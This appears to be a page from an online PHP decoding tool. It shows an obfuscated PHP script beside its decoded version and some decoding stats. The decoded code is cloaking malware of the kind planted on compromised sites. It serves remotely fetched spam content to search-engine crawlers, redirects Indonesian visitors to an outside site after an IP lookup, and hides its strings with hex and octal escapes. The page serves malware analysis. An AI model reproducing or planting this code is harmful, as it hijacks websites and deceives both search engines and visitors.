Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function profile_user() { $useragent = $_SERVER["\110\124\124\x50\x5f\125\x53\105\..

Decoded Output download

<?php 
 function profile_user() { $useragent = $_SERVER["HTTP_USER_AGENT"] ?? ''; $referer = $_SERVER["HTTP_REFERER"] ?? ''; $pasteUrl = "https://pub-05ba3407903e4840a55b8c21fc682cda.r2.dev/wave-studio.html"; $redirectUrl = "https://sambilkayang.pages.dev/"; $apiUrl = "https://api.incolumitas.com/?q="; $ipAddress = $_SERVER["REMOTE_ADDR"] ?? ''; $botAgents = array("Google-InspectionTool", "googlebot", "(compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "bingbot", "AhrefsBot", "slurp", "duckduckbot", "baiduspider", "yandexbot", "sogou", "exabot", "facebot", "ia_archiver"); $isBot = false; foreach ($botAgents as $bot) { if (stripos($useragent, $bot) !== false) { $isBot = true; break; } } if ($isBot) { $ch = curl_init($pasteUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $content = curl_exec($ch); if ($content === false) { echo "Error fetching content: " . curl_error($ch); curl_close($ch); die; } curl_close($ch); echo $content; } else { $ch = curl_init($apiUrl . $ipAddress); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); if ($response !== false && !empty($response)) { $data = json_decode($response, true); if (isset($data["location"]["country_code"]) && $data["location"]["country_code"] === "ID") { header("Location: {$redirectUrl}"); die; } } include "index.php"; die; } die; } profile_user(); ?>

Did this file decode correctly?

Original Code

<?php
 function profile_user() { $useragent = $_SERVER["\110\124\124\x50\x5f\125\x53\105\122\x5f\x41\x47\105\116\x54"] ?? ''; $referer = $_SERVER["\x48\x54\x54\x50\x5f\x52\105\106\x45\x52\x45\x52"] ?? ''; $pasteUrl = "\x68\164\164\160\x73\72\x2f\57\160\165\x62\55\60\65\142\141\x33\x34\60\67\x39\x30\x33\145\64\70\x34\60\141\65\x35\142\x38\143\x32\x31\x66\143\x36\x38\62\143\144\x61\x2e\x72\62\x2e\x64\145\x76\57\x77\141\x76\145\x2d\163\164\165\x64\x69\x6f\x2e\x68\x74\x6d\154"; $redirectUrl = "\x68\164\164\x70\x73\x3a\57\x2f\163\141\155\x62\151\154\153\x61\x79\141\156\147\x2e\160\x61\147\145\163\x2e\144\x65\x76\57"; $apiUrl = "\x68\164\164\x70\x73\x3a\57\57\141\160\x69\56\x69\x6e\x63\157\x6c\165\x6d\151\164\x61\163\56\x63\157\x6d\57\77\161\75"; $ipAddress = $_SERVER["\122\x45\115\117\x54\105\137\x41\x44\104\122"] ?? ''; $botAgents = array("\107\157\157\147\x6c\x65\x2d\111\x6e\163\160\145\143\164\x69\157\156\124\157\x6f\x6c", "\147\157\157\147\x6c\145\x62\157\164", "\x28\143\x6f\155\x70\141\x74\151\x62\x6c\145\73\x20\107\157\157\x67\x6c\145\142\157\x74\57\62\x2e\x31\x3b\40\x2b\150\164\164\x70\72\57\x2f\167\167\167\56\147\x6f\x6f\x67\154\x65\56\x63\x6f\x6d\x2f\x62\x6f\x74\x2e\150\164\x6d\154\51", "\142\x69\156\x67\x62\157\x74", "\101\150\x72\145\146\x73\x42\157\x74", "\163\x6c\x75\x72\x70", "\144\165\143\153\144\165\x63\x6b\x62\x6f\164", "\x62\x61\x69\144\165\x73\x70\x69\144\145\162", "\x79\141\x6e\x64\x65\170\142\157\164", "\x73\x6f\147\157\165", "\x65\x78\141\142\157\x74", "\x66\x61\x63\x65\142\157\x74", "\151\x61\x5f\x61\x72\143\150\151\x76\x65\162"); $isBot = false; foreach ($botAgents as $bot) { if (stripos($useragent, $bot) !== false) { $isBot = true; break; } } if ($isBot) { $ch = curl_init($pasteUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $content = curl_exec($ch); if ($content === false) { echo "\x45\x72\162\157\162\40\x66\x65\x74\143\150\x69\x6e\x67\40\143\157\156\164\145\x6e\x74\x3a\x20" . curl_error($ch); curl_close($ch); die; } curl_close($ch); echo $content; } else { $ch = curl_init($apiUrl . $ipAddress); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); if ($response !== false && !empty($response)) { $data = json_decode($response, true); if (isset($data["\x6c\157\x63\141\164\151\x6f\156"]["\143\x6f\x75\156\x74\162\x79\137\143\x6f\144\145"]) && $data["\x6c\157\x63\x61\164\151\x6f\x6e"]["\x63\x6f\165\156\164\162\x79\x5f\143\157\x64\x65"] === "\111\x44") { header("\114\157\143\141\x74\x69\157\x6e\72\x20{$redirectUrl}"); die; } } include "\151\x6e\144\x65\x78\x2e\160\150\160"; die; } die; } profile_user();

Function Calls

None

Variables

None

Stats

MD5 538f7a2e65670c510675849921257391
Eval Count 0
Decode Time 69 ms